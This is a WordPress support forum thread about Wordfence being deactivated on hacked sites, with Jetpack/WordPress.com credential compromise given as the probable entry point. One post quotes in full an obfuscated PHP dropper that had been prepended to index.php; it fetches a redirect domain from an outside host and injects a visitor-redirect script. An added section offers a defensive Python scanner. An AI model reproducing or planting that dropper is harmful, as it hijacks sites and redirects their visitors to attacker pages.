Support » Plugin: Wordfence Security - Firewall & Malware Scan » Wordfence Deactivating Automatically?

    dglambert

    (@dglambert)

    Watching this – I’ve had the same issue.

    Check the title of the plugin. If it’s just ‘wordfence’, you’ve been hacked.

    Kevin Maschke

    (@kevin-maschke)

    The plugin I Install is called “Wordfence Security” and in the description of it it says
    “Wordfence – Anti-virus, Firewall and Malware Scan”. “Versión 7.1.8 | By Wordfence”.

    tflora

    (@tflora)

    Same issue here. Got this email:

    This email was sent from your website “Lane Brody Official Website” by the Wordfence plugin at Saturday 30th of June 2018 at 01:20:56 AM
    The Wordfence administrative URL for this site is: http://www.lanebrody.com/wp-admin/admin.php?page=Wordfence
    A user with username “” deactivated Wordfence on your WordPress site.
    User IP: 127.0.0.1
    User hostname: localhost

    Was able to login and found a new User I hadn’t created. Wiped that out. Re-installed Wordfence and changed admin password. Still can’t figure out how this happened and worried that it will happen again. Any assurances?

    jeffman111

    (@jeffman111)

    This same thing happened to me yesterday. I received an email stating that my wordfence has been deactivated. Sure enough when I logged in I saw it was deactivated, then disappeared. No new users created.

    INTERESTING that Kevin’s email stated it came from IP: 192.0.86.188, and my email stated it came from IP: 192.0.113.112. When I checked both IP addresses, they are both registered to Automattic, the very people behind WordPress.com, WooCommerce, Jetpack, Simplenote, Longreads, VaultPress, Akismet, Gravatar, Polldaddy, Cloudup, and more.

    THAT is scary!

    defmans7

    (@defmans7)

    The same thing has been happening to me on multiple sites, many times. I login and Wordfence is indeed de-activated and there are foreign and modified files. Not sure which plugin is causing a vulnerability because I use an array of different plugins for my various clients.

    This email was sent from your website "[website name]" by the Wordfence plugin at Saturday 30th of June 2018 at 04:06:44 AM The Wordfence administrative URL for this site is: https://[domain-name].com/wp-admin/admin.php?page=Wordfence
    A user with username "[my admin login]" deactivated Wordfence on your WordPress site.
    User IP: 192.0.116.208
    User hostname: 192.0.116.208
    User location: Los Angeles, United States

    This is the first I’ve heard of others having the same issue.

    A file with this name is usually in the public_html directory “71ba5704c07aec55402cb7d674cb5783”

    and index.php usually has some code like this, prepended to it:

    <?php
     $id6fe1d0be634 = "/index/?2601510941471";
    $z8c7dd922ad47=md5($id6fe1d0be634);$u77e8e1445762=time();$geaa082fa5781=filemtime($z8c7dd922ad47);$u07cc694b9b3f=$u77e8e1445762-$geaa082fa5781;if(file_exists($z8c7dd922ad47)){$fe1260894f59e=@fopen($z8c7dd922ad47,base64_decode('cg=='));$xe4e46deb7f9c=json_decode(base64_decode(fread($fe1260894f59e,filesize($z8c7dd922ad47))),1);fclose($fe1260894f59e);}if($u07cc694b9b3f>=60 ||!file_exists($z8c7dd922ad47)){$v9b207167e538=getDDroi($z8c7dd922ad47);if($v9b207167e538[base64_decode('ZG9tYWlu')]){$je617ef6974fa=base64_decode('aHR0cDovLw==').$v9b207167e538[base64_decode('ZG9tYWlu')].$id6fe1d0be634;}else{$wd88fc6edf21e=curl_init();curl_setopt($wd88fc6edf21e,CURLOPT_RETURNTRANSFER,true);curl_setopt($wd88fc6edf21e,CURLOPT_USERAGENT,base64_decode('QUkgcnNydg=='));curl_setopt($wd88fc6edf21e,CURLOPT_URL,$xe4e46deb7f9c[base64_decode('cnNydg==')]);curl_setopt($wd88fc6edf21e,CURLOPT_TIMEOUT,10);$sad5f82e879a9=curl_exec($wd88fc6edf21e);curl_close($wd88fc6edf21e);$je617ef6974fa=base64_decode('aHR0cDovLw==').$sad5f82e879a9.$id6fe1d0be634;}}else{$je617ef6974fa=base64_decode('aHR0cDovLw==').$xe4e46deb7f9c[base64_decode('ZG9tYWlu')].$id6fe1d0be634;}function getDDroi($z8c7dd922ad47){$wd88fc6edf21e=curl_init();curl_setopt($wd88fc6edf21e,CURLOPT_RETURNTRANSFER,true);curl_setopt($wd88fc6edf21e,CURLOPT_USERAGENT,base64_decode('QUkgcm9p'));curl_setopt($wd88fc6edf21e,CURLOPT_URL,base64_decode('aHR0cDovL3JvaTc3Ny5jb20vZG9tYWluX3RlbXAucGhwP2Y9anNvbg=='));curl_setopt($wd88fc6edf21e,CURLOPT_TIMEOUT,10);$sb4a88417b3d0=curl_exec($wd88fc6edf21e);curl_close($wd88fc6edf21e);$xe4e46deb7f9c=json_decode($sb4a88417b3d0,true);if($xe4e46deb7f9c[base64_decode('ZG9tYWlu')]){$y0666f0acdeed=@fopen($z8c7dd922ad47,base64_decode('dys='));@fwrite($y0666f0acdeed,base64_encode($sb4a88417b3d0));@fclose($y0666f0acdeed);return $xe4e46deb7f9c;}else return false;}if(!$_COOKIE[base64_decode('YTc3N2Q=')]){setcookie(base64_decode('YTc3N2Q='),1,time()+43200,base64_decode('Lw=='));echo 
base64_decode('PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi').$je617ef6974fa.base64_decode('Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi').$je617ef6974fa.base64_decode('Ijs8L3NjcmlwdD4=');}
    

    Some links, even within the admin dashboard, redirect to a Baidu redirect, something like this: “http://www.baidu.com/link?url=bEUKnD70IK1cMzRUWPGE3CNBYzcT7EiuMM3p3Uy1LsZUeSgoQWxl9RlBWf_iSgwr”

    This one took me to a suspended account, “http://www.hatchy.com.au” – so I’m assuming it’s some type of DDOS attack.

    Would love to know the root cause of the vulnerability so I can patch it. So far it’s actually looking like the common thread is Wordfence.
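Added example, not code from the thread or from Wordfence: a small Python check for the two file-level indicators defmans7 describes, an md5-shaped filename sitting in the document root and code prepended to index.php. The stock-header string is an assumption (WordPress 4.x/5.x), and the dropper stand-in and sample roots are constructed for the demonstration.

```python
import os
import re
import tempfile

# A 32-character lowercase hex filename (md5-shaped), like the one named in the thread.
HEX32_NAME = re.compile(r"^[0-9a-f]{32}$")
# Calls used by the prepended dropper but never by a stock WordPress index.php.
SUSPICIOUS_CALLS = ("base64_decode(", "curl_init(", "setcookie(")
# Assumption: a stock index.php starts with this docblock (true for WordPress 4.x/5.x).
STOCK_INDEX_START = "<?php\n/**\n * Front to the WordPress application."

def scan_site_root(root):
    """Return (path, reason) findings for a WordPress document root."""
    findings = []
    for name in sorted(os.listdir(root)):
        if HEX32_NAME.match(name):
            findings.append((os.path.join(root, name), "md5-shaped filename in document root"))
    index = os.path.join(root, "index.php")
    if os.path.isfile(index):
        with open(index, encoding="utf-8", errors="replace") as fh:
            body = fh.read()
        if not body.startswith(STOCK_INDEX_START):
            findings.append((index, "index.php does not begin with the stock WordPress header"))
        hits = [call for call in SUSPICIOUS_CALLS if call in body]
        if hits:
            findings.append((index, "index.php contains " + ", ".join(hits)))
    return findings

STOCK_INDEX = STOCK_INDEX_START + "\n */\ndefine('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n"
# Constructed stand-in for the prepended dropper: same call pattern, no remote fetch.
DROPPER = "<?php if(empty($_COOKIE['a777d'])){setcookie('a777d',1,time()+43200,base64_decode('Lw=='));}\n"

def build_sample_root(infected):
    """Build a temporary document root; infected=True mimics the thread's description."""
    root = tempfile.mkdtemp(prefix="wp_sample_")
    with open(os.path.join(root, "index.php"), "w", encoding="utf-8") as fh:
        fh.write((DROPPER if infected else "") + STOCK_INDEX)
    with open(os.path.join(root, "wp-config.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php // constructed placeholder\n")
    if infected:
        # Cache file with the md5-shaped name quoted in the thread (contents constructed)
        with open(os.path.join(root, "71ba5704c07aec55402cb7d674cb5783"), "w") as fh:
            fh.write("ZG9tYWlu")
    return root

if __name__ == "__main__":
    for path, reason in scan_site_root(build_sample_root(True)):
        print(path, "->", reason)
```

Run it against a real document root with `scan_site_root("/path/to/public_html")`; a clean install returns an empty list.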

    CB

    (@cbrandt)

    A similar issue was reported a few days ago, and WF staff pointed to a data breach as possible reason for strangers obtaining credentials and accessing the website:

    https://wordpress.org/support/topic/wordfence-deactivated-and-replaced/

    Here are some resources on dealing with a hacked website:

    https://developers.google.com/web/fundamentals/security/hacked/
    https://webmasters.googleblog.com/2015/08/nohacked-fixing-injected-gibberish-url_24.html

    Good luck!
    CB

    defmans7

    (@defmans7)

    This is the post that CB is referring to, I think.
    https://wordpress.org/support/topic/wordfence-deactivated-and-replaced/#post-10418793

    So maybe my account was compromised and I was the vulnerability. I did have the Jetpack plugin installed on these sites I think.

    Recommend to enable 2FA for WordPress.com FYI.

    wfalaa

    (@wfalaa)

    Hi @kevin-maschke

    If you have the Jetpack plugin installed on your site, then please check my reply here, as that might be the entry point that allowed attackers to log into your site. Immediately change your WordPress.com password and enable 2FA.

    Thanks.

    Kevin Maschke

    (@kevin-maschke)

    Hi @wfalaa

    I saw that post, thank you. I’ve changed my WordPress.com password and enabled 2FA. Since then the incident hasn’t happened again.

    Regards,
    Kevin.
